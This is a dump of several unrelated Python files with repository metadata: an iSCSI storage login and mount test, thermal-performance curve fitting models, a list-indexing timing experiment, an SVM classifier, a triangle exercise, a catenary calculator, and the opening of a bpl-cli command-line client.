for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' %(device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endTime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endTime = ctime()
resultCollection("Creation of File on ISCSI Volume %s failed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
authors: ["karthik.s@cloudbyte.com"] | author_id: karthik.s@cloudbyte.com
blob_id: 8e1418e4e26d871472531d0c334592b6736bee75 | directory_id: 07f37b31c48ae80d32831fe6eb3f58b2e9f9a0f0 | content_id: 872bf6829ff506949e0289d4396550c3a78be115
path: /tpcfit/models.py | repo_name: hjosullivan/CMEEProject | detected_licenses: [] | license_type: no_license
snapshot_id: 2dcf970f2be47b43c81b78ac9dc754ef96199663 | revision_id: ee3dc452d9d61734f41eff94e2f4d0d896ed0cbe | branch_name: refs/heads/master
visit_date: 2022-08-26T12:49:52.615471 | revision_date: 2019-08-29T14:31:41 | committer_date: 2019-08-29T14:31:41 | github_id: 160,700,900 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: 2022-08-23T17:33:45 | gha_created_at: 2018-12-06T16:20:56 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 18,125 | extension: py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" models.py contains all available mathematical models to be fitted to thermal performance curves.
NOTE: Currently only Sharpe-Schoolfield variants """
import numpy as np
from lmfit import minimize, Minimizer, Parameters
class ThermalModelsException(Exception):
""" General purpose exception generator for ThermalModels"""
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return "{}".format(self.msg)
class ThermalModels(object):
""" Class containing thermal models for fitting """
# Set some useful class variables
# Bolzmann's constant
k = 8.617 * 10 ** (-5)
# Reference temperature (20 degrees C)
Tref = 283.15
# Set some useful error messages
_err_novals = ("Please supply input data for model fitting.")
_err_nonparam = ("Supplied parameters must be an instance of lmfit.parameter.Parameter or tpcfit.starting_parameters.StartParams")
_err_temperror = ("Temperature vector must be of type numpy.ndarray.")
_err_traiterror = ("Trait vector must be of type numpy.ndarray.")
_err_zero_neg_vals = ("Zero or negative values not accepted. Please supply positive values only.")
def __init__(self, temps=None, traits=None, fit_pars=None):
if temps is not None:
self.temps = temps
if not isinstance(temps, np.ndarray):
raise ThermalModelsException(self._err_temperror)
if self.temps is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.temps) < 0:
raise ThermalModelsException(self._err_zero_neg_vals)
if traits is not None:
self.traits = traits
if not isinstance(traits, np.ndarray):
raise ThermalModelsException(self._err_traiterror)
if self.traits is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.traits) < 0:
raise ThermalModelsException(self._err_zero_neg_vals)
if fit_pars is not None:
self.fit_pars = fit_pars
if not isinstance(fit_pars, Parameters):
self.fit_pars = self.fit_pars.gauss_params
#raise ThermalModelsException(self._err_nonparam)
elif self.fit_pars is None:
raise ThermalModelsException(self._err_novals)
@classmethod
def set_Tref(cls, Tref_val):
""" Allow user to set their own reference temperature """
cls.Tref = Tref_val
class SharpeSchoolfieldFull(ThermalModels):
model_name = "sharpeschoolfull"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssf_model = self.fit_ssf(temps, traits, fit_pars)
if self.ssf_model is not None:
# Return fitted trait values
self.ssf_fits = self.ssf_fitted_vals(self.ssf_model)
# Return parameter estimates from the model
self.final_estimates = self.ssf_estimates(self.ssf_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssf_init_params(self.ssf_model)
# Return AIC score
self.AIC = self.ssf_aic(self.ssf_model)
def ssf_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssf_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
El = self.fit_pars["El"].value
Th = self.fit_pars["Th"].value
Tl = self.fit_pars["Tl"].value
# Eh must be greater than E
if E >= Eh:
return 1e10
# TH must be greater than Tl
if Th < (Tl + 1):
Th = Tl + 1
# And Tl must be less than Th
if Tl > Th - 1:
Tl = Th - 1
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssf_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature according
to the Sharpe-Schoolfield model
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssf_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssf_model.params["B0"].value
E = self.ssf_model.params["E"].value
Eh = self.ssf_model.params["Eh"].value
El = self.ssf_model.params["El"].value
Th = self.ssf_model.params["Th"].value
Tl = self.ssf_model.params["Tl"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssf_fits = np.array(np.exp(model))
return self.ssf_fits
def fit_ssf(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssf_model = minimize(self.ssf_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssf_model
def ssf_estimates(self, ssf_model):
""" Get parameter estimates from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssf_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssf_model):
""" Get the initial parameter values supplied to the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssf_model.init_values
return self.initial_params
def ssf_aic(self,ssf_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssf_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldHigh(ThermalModels):
model_name = "sharpeschoolhigh"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssh_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssh_model is not None:
# Return fitted trait values
self.ssh_fits = self.ssh_fitted_vals(self.ssh_model)
# Return parameter estimates from the model
self.final_estimates = self.ssh_estimates(self.ssh_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssh_init_params(self.ssh_model)
# Return AIC score
self.AIC = self.ssh_aic(self.ssh_model)
def ssh_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssh_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
Th = self.fit_pars["Th"].value
# Eh must be greater than E
if E >= Eh:
return 1e10
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssh_fitted_vals(self, ssh_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature.
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssh_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
Eh = self.ssh_model.params["Eh"].value
Th = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssh_fits = np.array(np.exp(model))
return self.ssh_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssh_model = minimize(self.ssh_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssh_model
def ssh_estimates(self, ssh_model):
""" Get parameter estimates from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssh_model.params.valuesdict()
return self.final_estimates
def ssh_init_params(self, ssh_model):
""" Get the initial parameter values supplied to the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssh_model.init_values
return self.initial_params
def ssh_aic(self, ssh_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssh_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldlow(ThermalModels):
model_name = "sharpeschoollow"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssl_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssl_model is not None:
# Return fitted trait values
self.ssl_fits = self.ssl_fitted_vals(self.ssl_model)
# Return parameter estimates from the model
self.final_estimates = self.ssl_estimates(self.ssl_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssl_init_params(self.ssl_model)
# Return AIC score
self.AIC = self.ssl_aic(self.ssl_model)
def ssl_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssl_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
El = self.fit_pars["Eh"].value
Tl = self.fit_pars["Th"].value
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssl_fitted_vals(self, ssl_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature.
Parameters
----------
ssl_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssl_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssl_model.params["B0"].value
E = self.ssl_model.params["E"].value
El = self.ssl_model.params["Eh"].value
Tl = self.ssl_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssl_fits = np.array(np.exp(model))
return self.ssl_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssl_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssl_model = minimize(self.ssl_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssl_model
def ssl_estimates(self, ssl_model):
""" Get parameter estimates from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssl_model.params.valuesdict()
return self.final_estimates
def ssl_init_params(self, ssl_model):
""" Get the initial parameter values supplied to the model
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssl_model.init_values
return self.initial_params
def ssl_aic(self, ssl_model):
""" Get model AIC score
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssl_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
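# Usage sketch (assumptions: the lmfit parameter names match the keys read above
# (B0, E, Eh, El, Th, Tl); the data values below are purely illustrative):
#
#     import numpy as np
#     from lmfit import Parameters
#     temps = np.array([278.15, 283.15, 288.15, 293.15, 298.15, 303.15])
#     traits = np.array([0.4, 0.7, 1.1, 1.6, 1.9, 1.2])
#     pars = Parameters()
#     for name, value in [("B0", 1.0), ("E", 0.65), ("Eh", 3.0),
#                         ("El", 1.0), ("Th", 305.0), ("Tl", 280.0)]:
#         pars.add(name, value=value)
#     fit = SharpeSchoolfieldFull(temps, traits, pars)
#     print(fit.final_estimates, fit.AIC)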
authors: ["noreply@github.com"] | author_id: hjosullivan.noreply@github.com
blob_id: d115bee72cd6afec3acc95c9eb09d4221573f345 | directory_id: 9abebf3d5b197a20a16829035e8d3623220c7822 | content_id: d355aab09621e3116e41f59a31b87c89427a2f5c
path: /Chapter3/BigOListIndex.py | repo_name: JoeVentrella/CS260 | detected_licenses: [] | license_type: no_license
snapshot_id: 61e4e834f6c767d80cfe1e19460168f707e15bcd | revision_id: a717f4b476b6e80f25cd74c8effc343624ec9b42 | branch_name: refs/heads/master
visit_date: 2020-08-08T04:19:33.906563 | revision_date: 2019-12-15T01:54:40 | committer_date: 2019-12-15T01:54:40 | github_id: 213,710,821 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: 2019-10-08T17:57:35 | gha_created_at: 2019-10-08T17:42:15 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 765 | extension: py
import random
import timeit
exampleList = list(range(10000))
num = 10000
def bigOForListIndex(exampleList, n):
"""
Experiment to verify list index is O(1)
"""
for i in range(num):
index = random.randint(0, num-1)
exampleList[index]
def main():
for n in range(1000000, 10000001, 1000000):
exampleList = list(range(n))
indexTime = timeit.Timer("bigOForListIndex(exampleList,"+str(n)+")",
"from __main__ import exampleList,\
bigOForListIndex")
it = indexTime.timeit(number=1)
print ("Length of time for %d index access in %d list of"\
"numbers :%15.9f seconds" % (num, n, it))
if __name__ == '__main__':
main()
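# Contrast sketch (not part of the original experiment): membership testing with `in`
# scans the list element by element, so unlike indexing its time grows with the list size.
#
#     searchTime = timeit.Timer("9999999 in exampleList",
#                               "from __main__ import exampleList")
#     print(searchTime.timeit(number=1))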
authors: ["ventrellajoe1@gmail.com"] | author_id: ventrellajoe1@gmail.com
blob_id: 8d311b4049baf3cfb4d2c9c41c06f410bd88211c | directory_id: 74e6ea749db5e989dcec9e85a6dadab44b73a91e | content_id: 5aaf952eb9b89fe62df47c84fe7b73d10361507e
path: /restserver1/quickstart/svm.py | repo_name: torahss/restserver | detected_licenses: [] | license_type: no_license
snapshot_id: 94d373c31cc54aef32f3eeb24844c6c4af7be604 | revision_id: dadcb1c8c08b7af375bda3f9c2bca47a63a5b761 | branch_name: refs/heads/master
visit_date: 2023-02-02T12:48:38.672797 | revision_date: 2020-12-21T12:50:16 | committer_date: 2020-12-21T12:50:16 | github_id: 323,330,851 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,228 | extension: py
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
import pandas as pd
def svmRun(inputdata) :
data = pd.read_csv('/var/www/restserver/quickstart/train.csv', header=0, index_col=0, squeeze=True)
dataset = pd.DataFrame(data)
t_data = pd.read_csv('/root/Downloads/test.csv', header=0, index_col=0, squeeze=True)
t_data = pd.DataFrame(t_data)
tr_y = dataset.iloc[:,4]
tr_data = dataset.iloc[:, [0, 1, 2, 3]]
test_y = t_data.iloc[:,4]
t_data = t_data.iloc[:, [0, 1, 2, 3]]
svm = SVC(kernel='rbf',C=1.0, random_state=1, gamma=0.1)
svm.fit(tr_data,tr_y)
#print(inputdata[0][1])
y_pre_test = svm.predict(t_data)
t_data.iloc[1:2,0] = inputdata[0][0]
t_data.iloc[1:2, 1] = inputdata[0][1]
t_data.iloc[1:2, 2] = inputdata[0][2]
t_data.iloc[1:2, 3] = inputdata[0][3]
y_pred = svm.predict(t_data.iloc[1:2, ])
if y_pred[0] == 'Good' :
result = 0
elif y_pred[0] == 'Normal' :
result = 1
elif y_pred[0] == 'Bad':
result = 2
elif y_pred[0] == 'Worst':
result =3
print("Accuracy : %.2f" % accuracy_score(test_y, y_pre_test))
return result
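# Usage sketch (assumption: the four feature values below are illustrative and should be
# on the same scale as the feature columns of train.csv):
#
#     label_code = svmRun([[5.1, 3.5, 1.4, 0.2]])
#     print(label_code)  # 0=Good, 1=Normal, 2=Bad, 3=Worst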
authors: ["sungsamhong@gmail.com"] | author_id: sungsamhong@gmail.com
blob_id: 3fccf4fa9600a4a3e7b07d4b28660e603bcef30e | directory_id: 781e2692049e87a4256320c76e82a19be257a05d | content_id: 18e84ab880631f7510539ae77e9524b0eda2b632
path: /all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py | repo_name: itsolutionscorp/AutoStyle-Clustering | detected_licenses: [] | license_type: no_license
snapshot_id: 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | revision_id: be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | branch_name: refs/heads/master
visit_date: 2020-12-11T07:27:19.291038 | revision_date: 2016-03-16T03:18:00 | committer_date: 2016-03-16T03:18:42 | github_id: 59,454,921 | stars: 4 | forks: 0
gha_license_id: null | gha_event_created_at: 2016-05-23T05:40:56 | gha_created_at: 2016-05-23T05:40:56 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 621 | extension: py
# represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
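# Usage sketch showing how kind() maps the number of distinct side lengths to a name:
#
#     Triangle(2, 2, 2).kind()   # 'equilateral' - one distinct side length
#     Triangle(3, 4, 4).kind()   # 'isosceles'   - two distinct side lengths
#     Triangle(3, 4, 5).kind()   # 'scalene'     - three distinct side lengths
#     Triangle(1, 2, 3)          # raises TriangleError (fails the triangle inequality)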
authors: ["rrc@berkeley.edu"] | author_id: rrc@berkeley.edu
blob_id: 11b5246e31e2f5ef8ad5e9bcb8fdfabe438a1953 | directory_id: 6defd2219720396842ac564e7d6bf4f5146eddda | content_id: 0918a0110a0feec62435cf74110d084ab14fdc9e
path: /pycatenary.py | repo_name: fsanges/pyCatenary-NoElast | detected_licenses: ["LicenseRef-scancode-warranty-disclaimer"] | license_type: no_license
snapshot_id: 2e111d379d36582b6b1851d4e4eb2bc004f4dc25 | revision_id: 5901b06a208b802f12990ca0ecdce8c975c4a0e5 | branch_name: refs/heads/master
visit_date: 2021-12-01T20:55:56.685777 | revision_date: 2013-04-01T11:46:34 | committer_date: 2013-04-01T11:46:34 | github_id: null | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,660 | extension: py
#!/usr/bin/env python
# catenary calculation, re-written in python - NO Elasticity!!!
import math
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import fsolve
from inout import write_file
def cat(a):
# defining catenary function
#catenary eq (math): a*sinh(L/(2*a)+atanh(d/S))+a*sinh(L/(2*a)-atanh(d/S))-S=0
return a*math.sinh(L/(2*a)+math.atanh(d/S))+a*math.sinh(L/(2*a)-math.atanh(d/S))-S
L=float(input("Horizontal Distance between supports [m]: "))
d=float(input ("Vertical Distance between supports [m]: "))
S=float(input("Length of cable [m] - must be greater than distance between supports: "))
w=float(input("Unit weight of cable [kg/m]: "))
za=float(input("Elevation of higher support from reference plane [m]: "))
#checking if cable length is bigger than total distance between supports
distance=(L**2+d**2)**0.5
if S <= distance:
print ("Length of cable must be greater than TOTAL distance between supports!")
S=float(input("Length of cable [m]: "))
else:
pass
# solving catenary function for 'a'
a=fsolve(cat, 1)
# hor. distance between lowest catenary point (P) to higher support point (La)
La=a*(L/(2*a)+math.atanh(d/S))
# hor. distance between lowest catenary point (P) to lower support point (Lb)
Lb=L-La
# vert. distance from higher support point to lowest point (P) in catenary (ha)
ha=a*math.cosh(La/a)-a
## calculating reaction forces and angles
# catenary lenght between support "A" (higher) and "P" - Sa
Sa=a*math.sinh(La/a)
# catenary lenght between support "B" )lower) and "P" - Sb
Sb=a*math.sinh(Lb/a)
# horizontal tension - constant through catenary: H
H=w*a
# vertical tension at "A" (Va) and "B" (Vb)
Va=Sa*w
Vb=Sb*w
# tension at "A" (TA) and B (TB)
TA=(H**2+Va**2)**0.5
TB=(H**2+Vb**2)**0.5
# inclination angles from vertical at "A" (ThetA) and B (ThetB)
ThetA=math.atan(H/Va)
ThetB=math.atan(H/Vb)
ThetAd=ThetA*180/math.pi;
ThetBd=ThetB*180/math.pi;
# establishing A, B and P in coordinate system
# index "a" corresponding to point "A", "b" to "B"-point and "P" to lowest caten. point
zb=za-d
zp=za-ha
xa=La
xp=0
xb=-Lb
# writting results to file
fname='catenary_res.txt'
fn=open(fname, 'a')
write_file(fn, "Horizontal Distance between supports in meters: ", round(L,3))
write_file(fn, "Catenary length in meters: ", round(S,3))
write_file(fn, "Vertical Distance Between supports in meters: ", round(d,3))
write_file(fn, "Unit Weight of Catenary line in kg/m: ", round(w,3))
write_file(fn, "Elevation of higher support (A) from reference plane in meters: ", round(za,3))
write_file(fn, "\nCatenary coef.: ", round(a,5))
write_file(fn, "Horizontal tension in kg (constant along line: ", round(H,3))
write_file(fn, "Vertical tension in A in kg: ", round(Va,3))
write_file(fn, "Total tension in A in kg: ", round(TA,3))
write_file(fn, "Total tension in B in kg: ", round(TB,3))
write_file(fn, "Inclination angle from vertical at A in radians: ", round(ThetA,3))
write_file(fn, "Inclination angle from vertical at B in radians: ", round(ThetB,3))
write_file(fn, "Inclination angle from vertical at A in degrees: ", round(ThetAd,3))
write_file(fn, "Inclination angle from vertical at B in degrees: ", round(ThetBd,3))
fn.close()
# graphing catenary curve - matplotlib & writting coordinates in file
xinc=L/100
y=[]
xc=[]
fncoords="catenary_coords.txt"
fn=open(fncoords, "a")
for x in np.arange (xb, xa+xinc, xinc):
ycal=a*math.cosh(x/a)
fn.write("\n")
fn.write(str(round(x,3)))
fn.write("\t")
fn.write(str(round(ycal[0],3)))
y.append(ycal)
xc.append(x)
fn.close()
# plotting, finally
plt.plot(xc,y)
plt.xlabel("X-distance [m]")
plt.ylabel("Y-distance [m]")
plt.grid()
plt.show()
authors: ["deki.djokic@gmail.com"] | author_id: deki.djokic@gmail.com
blob_id: 748f97751e80a2258b78d59ce4a378db9a54d1b5 | directory_id: b743a6b89e3e7628963fd06d2928b8d1cdc3243c | content_id: c9143098c648f30df369d458d22b99d0e6d61a3a
path: /bpl_client/Client.py | repo_name: DuneRoot/bpl-cli | detected_licenses: ["MIT"] | license_type: permissive
snapshot_id: 847248d36449181856e6cf34a18119cd9fc1b045 | revision_id: 3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28 | branch_name: refs/heads/master
visit_date: 2020-03-25T17:42:06.339501 | revision_date: 2019-02-20T19:20:26 | committer_date: 2019-02-20T19:20:26 | github_id: 143,990,801 | stars: 3 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,781 | extension: py
"""
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
